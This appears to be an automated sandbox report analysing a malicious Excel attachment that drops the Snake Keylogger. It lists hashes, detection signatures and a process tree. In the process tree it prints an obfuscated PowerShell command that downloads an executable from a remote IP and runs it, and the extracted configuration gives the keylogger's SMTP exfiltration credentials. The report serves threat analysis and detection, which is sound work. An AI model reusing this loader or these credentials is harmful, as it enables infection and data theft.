Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
03-10-2024 06:29
Static task
static1
Behavioral task
behavioral1
Sample
Athnaton_ANP00224_Specification.xls
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
Athnaton_ANP00224_Specification.xls
Resource
win10v2004-20240802-en
General
-
Target
Athnaton_ANP00224_Specification.xls
-
Size
939KB
-
MD5
15d90d6aa9eb2c890494884bdaff2e91
-
SHA1
d55134055fb68cab73e32d6ed70d936399484a3d
-
SHA256
d472c895106cfebcb6eea8701416aed96b9770c256432ee7ee7a9b8a60a6d254
-
SHA512
a4f10b41f37be48b3ddf83e6c0d133cd8ae8655c4a8fac3235be0dc961c5bf2e3e80d6b924b446ba44a07b7bbdbf99d87b308637332bbb050b4c51c25dab5c8e
-
SSDEEP
12288:xmzHJEjwWYSqD3DERnLRmF8Dl3PTKuG44G24rBedMPQr6eyCQSEB9:gcwHSqbARM8B3ugedV7Q
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.purityontap.com - Port:
587 - Username:
[email protected] - Password:
mail55 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/2184-64-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2184-66-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2184-65-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 3 IoCs
flow pid Process 10 2696 mshta.exe 11 2696 mshta.exe 13 2096 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2096 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 308 taskhostw.exe -
Loads dropped DLL 1 IoCs
pid Process 2096 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000600000001942e-56.dat autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 308 set thread context of 2184 308 taskhostw.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1988 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2096 powershell.exe 2096 powershell.exe 2096 powershell.exe 2184 RegSvcs.exe 2184 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 308 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2096 powershell.exe Token: SeDebugPrivilege 2184 RegSvcs.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1988 EXCEL.EXE 1988 EXCEL.EXE 1988 EXCEL.EXE 1988 EXCEL.EXE 1988 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2696 wrote to memory of 2692 2696 mshta.exe 33 PID 2696 wrote to memory of 2692 2696 mshta.exe 33 PID 2696 wrote to memory of 2692 2696 mshta.exe 33 PID 2696 wrote to memory of 2692 2696 mshta.exe 33 PID 2692 wrote to memory of 2096 2692 cmd.exe 35 PID 2692 wrote to memory of 2096 2692 cmd.exe 35 PID 2692 wrote to memory of 2096 2692 cmd.exe 35 PID 2692 wrote to memory of 2096 2692 cmd.exe 35 PID 2096 wrote to memory of 2976 2096 powershell.exe 36 PID 2096 wrote to memory of 2976 2096 powershell.exe 36 PID 2096 wrote to memory of 2976 2096 powershell.exe 36 PID 2096 wrote to memory of 2976 2096 powershell.exe 36 PID 2976 wrote to memory of 2812 2976 csc.exe 37 PID 2976 wrote to memory of 2812 2976 csc.exe 37 PID 2976 wrote to memory of 2812 2976 csc.exe 37 PID 2976 wrote to memory of 2812 2976 csc.exe 37 PID 2096 wrote to memory of 308 2096 powershell.exe 39 PID 2096 wrote to memory of 308 2096 powershell.exe 39 PID 2096 wrote to memory of 308 2096 powershell.exe 39 PID 2096 wrote to memory of 308 2096 powershell.exe 39 PID 308 wrote to memory of 2184 308 taskhostw.exe 40 PID 308 wrote to memory of 2184 308 taskhostw.exe 40 PID 308 wrote to memory of 2184 308 taskhostw.exe 40 PID 308 wrote to memory of 2184 308 taskhostw.exe 40 PID 308 wrote to memory of 2184 308 taskhostw.exe 40 PID 308 wrote to memory of 2184 308 taskhostw.exe 40 PID 308 wrote to memory of 2184 308 taskhostw.exe 40 PID 308 wrote to memory of 2184 308 taskhostw.exe 40 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Athnaton_ANP00224_Specification.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1988
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c pOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'JGREYTI1RmEwZ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQmVSZEVGSU5JdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWXZIaWVyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFN0dWZyeFZEZ1IsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNZGdweCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVa3JHUSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk1IckREdEtUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzd2FCbnIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGREYTI1RmEwZ0U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy45LzI0MC90YXNraG9zdHcuZXhlIiwiJEVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUiLDAsMCk7U3RhUlQtc0xFRVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'JGREYTI1RmEwZ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQmVSZEVGSU5JdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWXZIaWVyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFN0dWZyeFZEZ1IsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNZGdweCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVa3JHUSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk1IckREdEtUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzd2FCbnIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGREYTI1RmEwZ0U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy45LzI0MC90YXNraG9zdHcuZXhlIiwiJEVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUiLDAsMCk7U3RhUlQtc0xFRVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dvruryrp.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEFDC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEFDB.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2812
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:308 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2184
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD5a1ed5b0d7a4b93a567568e1b853da625
SHA13d51717133bbcdeadee47bf3853d4008587f32da
SHA256991bbe32cb14bc3b17c2b8acb74c8bfd41941011e45dae4d57cdbd0cfaeeee5b
SHA5126558a26ba2fd33db27039387cac945ec06f14ca5af0180536fd6f96468ac200d6269a424521e2358d4ed0411f446369659a32b4a606d68eb42eadb7148f918fb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD52efcdfd171d7c2e0f483b4da814df9d6
SHA1967098f74b11db3c9ed50e2156755deb86a432c9
SHA256ed9c880149c9fdfebb716cadc7a8e2ba4ed815b877b1843e0fbfafcd190b2de5
SHA51287f0ed0117863dd869b4e4bfa71714f0ac6ea9237a34a246e55c00c2e8575e954812d43eee454b7ed102f6a9cd6c41d42fa76a846ca452b891aed80f4053e5a4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK\netbooknewthingsforupdnow[1].hta
Filesize8KB
MD534bcf67fd6bd5e6f44441e2068a15487
SHA174f265180f563786153bacdaffdaf8476f223d82
SHA2568d4f761ee1920e6e656e08082da4591e09589643f11bad0313d39138048fd22e
SHA51298bc22451aaa09eaf5155847c7a07a91223bdbcd5e0a6cc543ddb525e6a522fb22e38f304e249c4ee92e01a7b0a010b70b6fead3db593587527f99e79137d6d6
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD59e2cab3ecdb9c793ce01c436984e3872
SHA164f6e68969b177df667aa8b984113fb8a44fc38c
SHA2567ce154783810e11e02d6a5257d4f86d1553755eeb5f253679f4267fa95970f4b
SHA51296b48aeec7d4e72b1e34996706e9a2e790dc2616ca4b557933330f5c6c4be644411047c64ceb221e5a85c7276af460f0b4d4ccb1404f91b491f65d32bbd79d3d
-
Filesize
3KB
MD561bc13dec2cce2aea39f6a162d3cd810
SHA153ad616b2adb9fa23444f82f268190226d5aa9fa
SHA25634e56b7a84344884b5b896c0fff85bf7ef65739cdba02c909e14097c51fbc25c
SHA5127b9748baaf44cc1c8d71b0efd589106ec45f9ad107bc1d8d95300091564994ba8f7994cd3e839454fde4849a086b65cf57d0e18fc444b629d56a7e0c6df7639e
-
Filesize
7KB
MD51b21033b7b014dfb64ce04c7bfeaebcf
SHA152a379985850c76e4e02af8457bc554fa016a51e
SHA2568baacb4680d7b32a6ade9311602e2b03e99e58030ae0baf933b4df46466da888
SHA5124311a8df0959849b7db35d55e68073ca2169d05b2fe1037f08ac24249ad13b271624b2e0114e4f19cfd3774bcd1411ebd63dda4830afd71cbf25cd2d8b26c4c6
-
Filesize
931KB
MD558ff14d476f2bbaab31b12587c09559e
SHA1ea9c7ce65a67f2a2d4e1ca4a2c3ac6785021fc94
SHA2561640e87780b219eba703c734e68b0f5cf793bc94fe0cdf9121658d12bb1f9364
SHA512a75d4bd80620a9441783131812780397fb0c3b1c6d6b9147d65ece23d9cc9384c148f6c491794cfbc012c290e3266e06a76357b84141b843929a295c2649613a
-
Filesize
652B
MD536aaa7a711056305afd9ae4bdaffb0d4
SHA1b3828b95c630f1849c38363096a973647cf9d6d3
SHA256eb06a412e95586651a24bb1f092f00563e751a45cf8f21aabdfa3fa31d1f749a
SHA51283a42a6ae3fafadf5bb5cd95cb4d318f9672cb2f49318e3451ed6d313883a49077838c6fb8a25300a64138478b8a35bc9efb3d2c0d98176d32d82b0be41545f2
-
Filesize
477B
MD53c2b912e8118e7163d3d05a557f13d2f
SHA18889f87c11a2fca2b363c3064d317447a29c5498
SHA256822f2e3e97f3d3f1d6a78969a3b8e502a2dd611a0bb9e1abccfd94f6faa22852
SHA5127aeb33879a1c6a8a639e65e4dab9076d2c0c03bb65e2883c342d35b3ae3cbcda8dc6158da09ded5d908193af173cb4c34014b0055b13c1ed9be74fb3fe896499
-
Filesize
309B
MD5592765e4559edb3f262f60b8c6bfdbf5
SHA137ba6da312ea7c643d54d3e9b000f35d97966d7d
SHA256cf7bacbe5493fa28def69d791724799fbb6c1024e4dc82586603ae6e388c8423
SHA512655577bf850762f3cf89cb3986b69ac634006afa68a851ba1159bb0d831f0d2bb5553a4ec8120f6e1cb16eecdf9a2de5097d2afab30770d148fd38088e28849b